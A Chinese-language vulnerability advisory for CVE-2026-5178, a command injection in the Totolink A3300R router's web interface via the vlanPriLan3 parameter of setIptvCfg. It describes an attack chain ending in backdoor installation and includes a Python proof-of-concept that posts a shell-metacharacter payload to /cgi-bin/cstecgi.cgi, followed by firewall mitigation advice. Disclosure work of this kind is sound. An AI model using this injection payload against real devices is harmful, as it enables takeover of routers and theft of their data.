CVE-2026-5178 CVSS 6.3 中危

CVE-2026-5178 Totolink A3300R 命令注入漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5178

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink A3300R

漏洞概述

Totolink A3300R 17.0.0cu.557_b20221024版本存在安全漏洞。该漏洞源于设备/cgi-bin/cstecgi.cgi文件中的setIptvCfg函数未能有效过滤用户输入。攻击者可通过恶意构造参数vlanPriLan3，利用命令注入漏洞在系统后台执行任意操作系统命令。由于攻击可通过网络发起且无需用户交互，该漏洞可能被未授权的远程攻击者利用，进而控制设备或窃取数据。

技术细节

该漏洞位于Totolink A3300R路由器的Web管理接口中。受影响的具体文件为/cgi-bin/cstecgi.cgi，其中包含一个名为setIptvCfg的函数，主要用于配置IPTV相关的网络参数。在处理vlanPriLan3参数时，程序未对输入数据进行严格的边界检查或特殊字符过滤，直接将其传递给了底层的系统调用函数（如system()或popen()）。攻击者通过向Web接口发送特制的HTTP POST请求，并在vlanPriLan3字段中注入Shell元字符（如分号、管道符或反引号），即可欺骗系统执行攻击者指定的恶意命令。由于CGI程序通常以root权限运行，成功利用该漏洞可能导致攻击者获取设备的最高控制权。CVSS向量显示攻击需要低权限（PR:L），意味着攻击者通常需要先通过Web界面登录，或者该接口存在某种程度的认证绕过，但利用过程无需用户交互且范围未改变。

攻击链分析

STEP 1

侦查

攻击者扫描网络，识别出运行特定固件版本Totolink A3300R的目标设备。

STEP 2

认证

攻击者获取低权限账户登录凭证，或利用该接口可能存在的认证缺陷（CVSS PR:L）。

STEP 3

漏洞利用

攻击者向/cgi-bin/cstecgi.cgi发送特制的POST请求，在setIptvCfg功能的vlanPriLan3参数中注入恶意Shell命令。

STEP 4

命令执行

服务器端由于未过滤特殊字符，将恶意参数拼接进系统命令并执行，导致攻击者获得系统Shell权限。

STEP 5

维持权限

攻击者利用获得的权限安装后门、窃取敏感配置或进一步横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
target_url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi"

# Headers
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded"
}

# Payload data injecting command via vlanPriLan3
# Example: Ping back to attacker or execute a shell command
payload = {
    "action": "setIptvCfg",
    "vlanPriLan3": "1; echo 'CVE-2026-5178 Vulnerable' > /tmp/poc.txt; #"
}

try:
    # Sending POST request
    response = requests.post(target_url, headers=headers, data=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Failed to send request. Status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Totolink A3300R 17.0.0cu.557_b20221024

防御指南

临时缓解措施

如果无法立即升级固件，建议通过防火墙规则限制对设备Web管理端口（通常为80或443）的访问，仅允许可信的IP地址连接。此外，应密切关注官方安全公告并及时应用补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5178
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5178
3 Details https://www.cvedetails.com/cve/CVE-2026-5178/
4 VulDB https://vuldb.com/cve/CVE-2026-5178
5 Link https://github.com/LvHongW/Vuln-of-totolink_A3300R/tree/main/A3300R_vlanPriLan3_cmd_inject
6 Link https://vuldb.com/submit/779147
7 Link https://vuldb.com/vuln/354246
8 Link https://vuldb.com/vuln/354246/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表